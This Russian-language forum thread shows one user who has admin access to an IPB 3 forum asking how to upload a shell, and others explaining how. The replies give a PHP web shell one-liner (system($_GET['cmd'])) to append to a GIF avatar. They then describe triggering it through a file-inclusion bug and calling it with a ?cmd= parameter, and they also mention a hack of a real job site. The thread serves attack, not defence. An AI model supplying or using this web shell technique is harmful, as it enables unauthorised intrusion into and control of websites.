Перейти к содержанию
Авторизация  
Ne3na1ka

Ipb

Рекомендуемые сообщения

Есть доступ к админке в IPB 3

Как залить туда shell

 

 

Если будет скажите как будут новые шары

 

 

 

Дам на пиво

 

ICQ 369645824

 

Skype:game_x24

Изменено пользователем Ne3na1ka

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Есть доступ к админке в IPB 3

Как залить туда shell

 

 

Если будет скажите как будут новые шары

 

Вы форумом немного ошиблись вам на жук :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Там где заливать шаблон, выбери шелл и попробуй залить, либо же ищи каким еще методом можно залить, на сколько знаю можно через админку аватар менять, ну изменяем картинку в ней пишем шелл, далее заливаем ее как аватар, и можно творить чудо :D

С тебя ++

Изменено пользователем stasuk25
  • Upvote 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Сохраняешь рисунок в *.gif, затем открываем её блокнотом и в самый конец каракулей. с новой строки пишем shell-code. Самый простой -

<?php system($_GET["cmd"]); ?>

Заливаем картинку на сайт(в качестве аватара) и если имеется уязвимость типа php-including инклудим картинку и получаем шелл. Сейчас очень тяжело найти сайт корый не фильтровал бы содержимое аватара и содержал бы в себе багу php-including'а. Если тебя заинтересовала это тема советую посмотреть видео - взлом rabota.ru, там через как я понял смежный сайт - ucheba.ru ломается rabota.ru и всё это с использованием инклуда и боевой аватары!

Все сылки НЕ РЕКЛАМА в качестве помочь создателю темы!

  • Upvote 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

картинку загрузил

 

как это сделать php-including инклудим картинку и получаем шелл

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Узнай путь к картинке, затем вставь ее в новом окне и допиши после .gif?cmd= и сделай что надо.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти
Авторизация  

  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×
×
  • Создать...